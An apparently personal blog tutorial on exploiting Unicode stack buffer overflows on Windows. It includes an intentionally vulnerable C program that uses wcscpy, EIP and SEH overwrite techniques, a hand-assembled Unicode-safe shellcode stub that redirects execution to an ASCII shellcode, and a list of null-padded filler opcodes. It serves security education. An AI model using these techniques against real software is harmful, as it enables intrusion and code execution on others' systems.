EIP = 0x00410041 ?? Exploiting Unicode Buffer Overflows

Hello all =)

I’m writing this post in English (a poor English) because I will perhaps refer to this article on other sites. But you can download the French version here: Unicode Buffer Overflows Exploitation – French Version.pdf

Introduction :

Maybe you’ve already run into problems when trying to exploit a buffer overflow: EIP = 0x00410041, for example, when you had entered a string like « AAAA… ». Maybe you haven’t, but I think it is very interesting to understand when we can be confronted with this case and what causes it.

Understanding Unicode Strings :

First of all, I’m going to briefly present how Unicode strings work. Unicode strings were created so that every language can be used in any country without transliteration problems. For example, Arabic characters are different from ours. You understand that this string مهمءضك cannot be represented with the ASCII codes we know. With Unicode strings it is possible to use any kind of character. You can find a great overview of Unicode characters here.

I won’t explain more about Unicode strings; I’m now going to show you how to use them.

Using Unicode Strings :

In C, there is a list of functions for manipulating Unicode strings on Windows: Unicode Functions.

Let us take a look at the ASCII/Unicode conversion functions:

    • MultiByteToWideChar() : ASCII -> Unicode :
int MultiByteToWideChar(
  UINT CodePage,
  DWORD dwFlags,
  LPCSTR lpMultiByteStr,
  int cbMultiByte,
  LPWSTR lpWideCharStr,
  int cchWideChar
);
    • WideCharToMultiByte() : Unicode -> ASCII :
int WideCharToMultiByte(
  UINT CodePage,
  DWORD dwFlags,
  LPCWSTR lpWideCharStr,
  int cchWideChar,
  LPSTR lpMultiByteStr,
  int cbMultiByte,
  LPCSTR lpDefaultChar,
  LPBOOL lpUsedDefaultChar
);

I call your attention to the CodePage parameter:

[in] Code page used to perform the conversion.

You can set this parameter to any code page that is installed or available in the system. You can also specify one of the values shown in the following table.

Value            Description
CP_ACP           ANSI code page
CP_MACCP         Not supported
CP_OEMCP         OEM code page
CP_SYMBOL        Not supported
CP_THREAD_ACP    Not supported
CP_UTF7          UTF-7 code page
CP_UTF8          UTF-8 code page

When SYSGEN_LOCUSA is set, only the 1252 and 437 code pages are supported.

To create an image that has very limited locale support, specify the image with SYSGEN_CORELOC and put the necessary locales for the image into Public\Common\Oak\Files\Nlscfg.inf.

When converting an ASCII string to Unicode, the result depends on the code page used. An example of conversion:

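#include <stdio.h>
#include <string.h>
#include <windows.h>
#define SIZE 56

int main(int argc, char *argv[])
{
  wchar_t wcStr[SIZE] = {0};  /* zeroed so the converted string stays NUL-terminated */
  char cStr[SIZE] = {0};
  memcpy(cStr, "\xB0\x42\x43\x44", 4);
  MultiByteToWideChar(CP_OEMCP, 0, cStr, 4, wcStr, SIZE);  /* arrays passed directly, not &array */
  printf("%ws", wcStr);
  return 0;
}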

Here I’m using the OEM code page.

Now let us have a look at the memory:


It seems that each character is followed by a null byte. In fact « ABCD » = 41 42 43 44 becomes « A.B.C.D » = 41 00 42 00 43 00 44 00.
Actually, characters up to 0x7F follow this principle. But if you use a character above 0x7F, it won’t necessarily be the case.
Indeed, 0xB0 becomes the bytes 91 25 in the OEM code page (the character U+2591, stored low byte first). You can find a great conversion table here: Practical Win32 and Unicode exploitation.
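To make the conversion concrete without needing the Windows API, here is a small portable sketch of what ends up in memory. The helper names (widen_byte, widen_to_utf16le) are mine, and the table only contains the two OEM code page 437 entries mentioned in this article; every other byte above 0x7F falls back to a placeholder, so this is an illustration and not a replacement for MultiByteToWideChar().

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: maps one input byte to a UTF-16 code unit.
   Bytes below 0x80 map to themselves. Only two code page 437 entries
   are filled in; the rest use '?' as a placeholder (NOT the real mapping). */
static uint16_t widen_byte(uint8_t b)
{
    if (b < 0x80)
        return b;
    switch (b) {
    case 0xB0: return 0x2591; /* light shade block */
    case 0xC0: return 0x2514; /* box drawing corner */
    default:   return 0x003F; /* placeholder only */
    }
}

/* Writes the UTF-16 little-endian bytes of src into dst.
   dst must have room for 2 * n bytes. */
static void widen_to_utf16le(const uint8_t *src, size_t n, uint8_t *dst)
{
    assert(src != NULL && dst != NULL);
    for (size_t i = 0; i < n; i++) {
        uint16_t u = widen_byte(src[i]);
        dst[2 * i]     = (uint8_t)(u & 0xFF); /* low byte first */
        dst[2 * i + 1] = (uint8_t)(u >> 8);   /* then high byte */
    }
}
```

Feeding it the four bytes B0 42 43 44 from the example gives 91 25 42 00 43 00 44 00, which is the pattern visible in the memory dump.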
OK, now what about Unicode buffer overflows?

Redirecting the program flow :

Rewriting the RET address :

This is an example of a program which crashes because of a stack overflow with Unicode strings:

#include <string.h>
#include <wchar.h>
#include <windows.h>

#define SIZE 56

int main(int argc, char *argv[])
{
  wchar_t wcBofMe[1];
  wchar_t wcStr[SIZE];
  char cStr[SIZE];
  memset(cStr, 0x41, SIZE - 1);  /* 55 'A' characters */
  cStr[SIZE - 1] = '\0';         /* terminator, converted along with the rest */
  MultiByteToWideChar(CP_OEMCP, 0, cStr, SIZE, wcStr, SIZE);
  wcscpy(wcBofMe, wcStr); // Will crash: 56 wide chars copied into a 1-element buffer
  return 0;
}

When running this program, it crashes and EIP is 0x00410041 (the bytes 41 00 41 00 read as a little-endian DWORD):


Well, we clearly see that we control only 2 of the 4 bytes that make up the EIP register. This is a real problem: it is difficult to find a JMP ESP, for example, at an address like 0x00yy00zz.

But remember what I said: some bytes (> 0x7F) have a special translation in Unicode with the OEM code page. For example, 0xC0 becomes the bytes 14 25. So I’ve modified my string and I obtain:


So it means that we can actually overwrite all 4 bytes of EIP. There is a plugin for OllyDbg which allows you to find addresses in Unicode format (0x00yy00zz) of JMP ESP, CALL ESP, …: it is OllyUNI. Another plugin exists for Immunity Debugger: pvefindaddr.
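As a rough idea of the kind of check such a plugin has to perform, here is a sketch in C. The function names are mine and this is not the code of OllyUNI or pvefindaddr: it only recognises the plain case where both controlled bytes are below 0x80, and it ignores the code page translations discussed above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Reads 4 bytes the way x86 does: the byte at the lowest address
   is the least significant one. */
static uint32_t le_dword(const uint8_t *b)
{
    assert(b != NULL);
    return (uint32_t)b[0]
         | ((uint32_t)b[1] << 8)
         | ((uint32_t)b[2] << 16)
         | ((uint32_t)b[3] << 24);
}

/* Returns 1 if addr has the form 0x00yy00zz with yy and zz in 0x01..0x7F,
   i.e. an address that two plain ASCII characters widen to. */
static int is_plain_unicode_addr(uint32_t addr)
{
    uint8_t zz = (uint8_t)(addr & 0xFF);
    uint8_t yy = (uint8_t)((addr >> 16) & 0xFF);
    if ((addr & 0xFF00FF00u) != 0)
        return 0;
    return yy >= 0x01 && yy <= 0x7F && zz >= 0x01 && zz <= 0x7F;
}
```

For instance, the bytes 41 00 41 00 give 0x00410041, which passes the check, while a typical system DLL address such as 0x7C86467B does not.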

SEH rewriting :

We know there is another method to redirect the program flow: SEH overwriting. With Unicode strings, the principle is the same (overwrite the SEH Handler address with a pointer to a POP POP RET instruction sequence), but we won’t be able to use a JMP SHORT. Writing a JMP SHORT with a Unicode string is almost impossible, and it depends too much on the code page used.

So the principle is not to make a JMP SHORT, but to let the program execute the bytes contained in Next SEH and SEH Handler as ordinary instructions, hoping it won’t crash. Then, if these instructions don’t cause any harm, we will be able to execute a shellcode located after the SEH structure. I know it is a bit difficult to understand, so just look at this diagram:


For steps 1 and 2 there is no problem.

But step 3 is trickier and requires two conditions:

      • The bytes of Next SEH, when executed, must not cause any harm.
      • Similarly, the bytes of the SEH Handler address must not raise an exception when executed.

Here is an example of an address which can cause a crash: 0x41560020. Stored in little-endian order, its bytes are 20 00 56 41, which execute as:

2000           AND BYTE PTR DS:[EAX],AL
56             PUSH ESI
41             INC ECX

Here, if EAX contains a value like 0x00000000, an « Access violation » exception is raised when executing the first instruction.


Exploiting Unicode Buffer Overflows :

RET on ASCII shellcode :

When we convert an ASCII string to a Unicode one, the original ASCII string still stays in memory. So if we can jump to it, we will be able to execute a « normal » shellcode. But how can we make a jump? As I told you before, it is almost impossible to make a jump with a Unicode shellcode…

Well, we have to find another solution. I suggest you read this paper dealing with the instructions we can use under Unicode constraints: Building IA32 ‘Unicode-Proof’ Shellcodes.

In my case I want to jump to the address 0x0022FD88, which points to my ASCII shellcode.

So I will use this unicode shellcode :

0040139D     B8 00220000    MOV EAX,2200 ; EAX = 00002200
004013A2     50             PUSH EAX
004013A3     4C             DEC ESP
004013A4     58             POP EAX ; EAX = 002200??
004013A5     05 00FD0000    ADD EAX,0FD00 ; EAX = 0022FD??
004013AF     B0 00          MOV AL,0 ; EAX = 0022FD00
004013AA     B9 00880000    MOV ECX,8800 ; ECX = 00008800
004013B1     00E8           ADD AL,CH ; EAX = 0022FD88
00401284     50            PUSH EAX
00401285     C3            RETN

Well, if I can give you some advice: when you have an address like 0xTTUUVVWW, begin by setting TT, then UU, … It is really less complicated.
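If the PUSH / DEC ESP / POP trick is not obvious, the register arithmetic of the shellcode above can be traced in plain C. This is only a model of the values in EAX and ECX, not an emulator; the function name trace_eax and the parameter stale (the unknown byte sitting just below the pushed DWORD on the stack) are mine.

```c
#include <assert.h>
#include <stdint.h>

/* Models the value of EAX after each instruction of the listing.
   stale is the unknown byte located just below the pushed DWORD. */
static uint32_t trace_eax(uint8_t stale)
{
    uint32_t eax, ecx;
    uint8_t al, ch;

    eax = 0x00002200u;               /* MOV EAX,2200  -> 00002200 */
    /* PUSH EAX ; DEC ESP ; POP EAX: the DWORD is read back one byte
       lower, so it shifts left by 8 bits and picks up one stale byte. */
    eax = (eax << 8) | stale;        /*               -> 002200?? */
    eax += 0x0000FD00u;              /* ADD EAX,0FD00 -> 0022FD?? */
    eax &= 0xFFFFFF00u;              /* MOV AL,0      -> 0022FD00 */
    assert(eax == 0x0022FD00u);      /* the stale byte is gone here */

    ecx = 0x00008800u;               /* MOV ECX,8800 */
    ch = (uint8_t)(ecx >> 8);        /* CH = 88 */
    al = (uint8_t)(eax & 0xFF);
    al = (uint8_t)(al + ch);         /* ADD AL,CH */
    eax = (eax & 0xFFFFFF00u) | al;  /*               -> 0022FD88 */
    return eax;
}
```

Whatever the stale byte is, the MOV AL,0 step wipes it, so the result is always 0x0022FD88.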

Then it is important to understand how to « play » with the ESP register and the POP/PUSH instructions. Now if you consider my string:

B8 00 22 00 00 50 4C 58 05 00 FD 00 00 B0 00 B9 00 88 00 00 00 E8, you see that there is no null byte between 50 and 4C, for example.
Well, it is not critical. In fact there are instructions whose opcodes look like this: 00 XX 00. In my case I will use:

004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH

So I obtain this shellcode :

0040139D     B8 00220000    MOV EAX,2200 ; EAX = 00002200
004013A2     50             PUSH EAX
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
004013A3     4C             DEC ESP
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
004013A4     58             POP EAX ; EAX = 002200??
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
004013A5     05 00FD0000    ADD EAX,0FD00 ; EAX = 0022FD??
004013AF     B0 00          MOV AL,0 ; EAX = 0022FD00
004013AA     B9 00880000    MOV ECX,8800 ; ECX = 00008800
004013B1     00E8           ADD AL,CH ; EAX = 0022FD88
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
00401284     50            PUSH EAX
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
00401285     C3            RETN

Now my string is OK. We just have to build an ASCII shellcode.

Using a decoder :

But imagine the case where you can’t return to your ASCII string. You will be obliged to write a Unicode shellcode, but writing a shellcode directly in Unicode is too difficult. Nevertheless, there is a technique based on Venetian shellcodes. Some tools, like alpha2, encode an ASCII shellcode into a Unicode one, which is then decoded by a (Unicode-compatible) decoder. After the decoder has been executed, we just have to jump to the original shellcode. But this method requires one condition:

      • At least one register, and preferably two (EAX and ECX for example), must point one to the encoded shellcode and the other to a writable memory area. However, it is possible with just one register that points to the encoded shellcode, which will then modify itself.

Nonetheless, you will ask me: why do we need a register which points to the shellcode? Well, as I told you, there are a few instructions whose opcodes look like this: 00 XX 00. Those are instructions we can use, and they are similar to the one I’ve already used:

0072 00        ADD BYTE PTR DS:[EDX],DH

In this case, if EDX points to our shellcode, we are able to modify it via DH.
Here is a short list of instructions of this kind:

CPU Disasm
Address   Hex dump          Command                                  Comments
00401220      0060 00       ADD BYTE PTR DS:[EAX],AH
00401223      0061 00       ADD BYTE PTR DS:[ECX],AH
00401226      0062 00       ADD BYTE PTR DS:[EDX],AH
00401229      0063 00       ADD BYTE PTR DS:[EBX],AH
0040123E      006A 00       ADD BYTE PTR DS:[EDX],CH
00401241      006B 00       ADD BYTE PTR DS:[EBX],CH
00401253      0071 00       ADD BYTE PTR DS:[ECX],DH
00401256      0072 00       ADD BYTE PTR DS:[EDX],DH
00401259      0073 00       ADD BYTE PTR DS:[EBX],DH
00401262      0076 00       ADD BYTE PTR DS:[ESI],DH
00401265      0078 00       ADD BYTE PTR DS:[EAX],BH
00401268      0079 00       ADD BYTE PTR DS:[ECX],BH
0040126B      007A 00       ADD BYTE PTR DS:[EDX],BH
0040126E      007B 00       ADD BYTE PTR DS:[EBX],BH
00401277      007E 00       ADD BYTE PTR DS:[ESI],BH
0040127A      007F 00       ADD BYTE PTR DS:[EDI],BH
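If you want to work out what another 00 XX 00 sequence does without a debugger, the middle byte is an ordinary ModRM byte and can be decoded by hand. The sketch below (names are mine) only handles the case seen in the list: mod = 01 (one displacement byte, here 00) and no SIB byte. Anything else is reported as not handled.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

static const char *const REG32[8] = {"EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"};
static const char *const REG8[8]  = {"AL", "CL", "DL", "BL", "AH", "CH", "DH", "BH"};

/* Decoded operands of "00 modrm 00": ADD BYTE PTR [base],src */
struct add_filler {
    const char *base; /* 32-bit register used as the address */
    const char *src;  /* 8-bit register that is added */
};

/* Returns 0 and fills *out when modrm has mod = 01 and needs no SIB byte,
   -1 otherwise (those encodings are outside this sketch). */
static int decode_add_filler(uint8_t modrm, struct add_filler *out)
{
    assert(out != NULL);
    unsigned mod = modrm >> 6;
    unsigned reg = (modrm >> 3) & 7u;
    unsigned rm  = modrm & 7u;
    if (mod != 1u || rm == 4u)
        return -1;
    out->base = REG32[rm];
    out->src  = REG8[reg];
    return 0;
}

/* Prints one line in the style of the list above. */
static void print_add_filler(uint8_t modrm)
{
    struct add_filler f;
    if (decode_add_filler(modrm, &f) == 0)
        printf("00%02X 00       ADD BYTE PTR [%s],%s\n", modrm, f.base, f.src);
}
```

Calling print_add_filler(0x72) gives the instruction I used as filler: ADD BYTE PTR [EDX],DH. Values such as 0x64 or 0x74 are rejected because they need an extra SIB byte.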

These instructions can be very useful when adjusting the Unicode shellcode to make a jump to the ASCII string (previous method).
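To show why a register pointing at the buffer matters, here is a very simplified model in C of the Venetian idea: after conversion every second byte is 00, and an ADD BYTE PTR [reg],reg8 on such a slot writes the missing byte. The function names are mine, and this is only the principle: a real decoder has to be built from Unicode-compatible instructions itself, and this is not how alpha2 is implemented.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Models "ADD BYTE PTR [reg],reg8": adds val to the byte at p. */
static void add_byte_ptr(uint8_t *p, uint8_t val)
{
    *p = (uint8_t)(*p + val);
}

/* buf holds nchars widened characters (XX 00 XX 00 ...).
   Each 00 slot receives the matching byte of missing[], so that buf
   ends up holding 2 * nchars consecutive meaningful bytes. */
static void venetian_fill(uint8_t *buf, size_t nchars, const uint8_t *missing)
{
    assert(buf != NULL && missing != NULL);
    for (size_t i = 0; i < nchars; i++) {
        uint8_t *slot = &buf[2 * i + 1]; /* the pointer register */
        add_byte_ptr(slot, missing[i]);  /* 00 + value = value */
    }
}
```

Starting from 41 00 43 00 and adding 42 and 44 into the empty slots gives 41 42 43 44: the null bytes have been closed like the slats of a Venetian blind.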


I’m sorry for not illustrating this part, but I don’t have the time. Maybe I will give you some examples soon in a post.

This article was a very short introduction to Unicode buffer overflows, so I will end by recommending an excellent and much more comprehensive paper on this topic: Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc by Peter Van Eeckhoutte.

Some Unicode Buffer Overflows exploits :
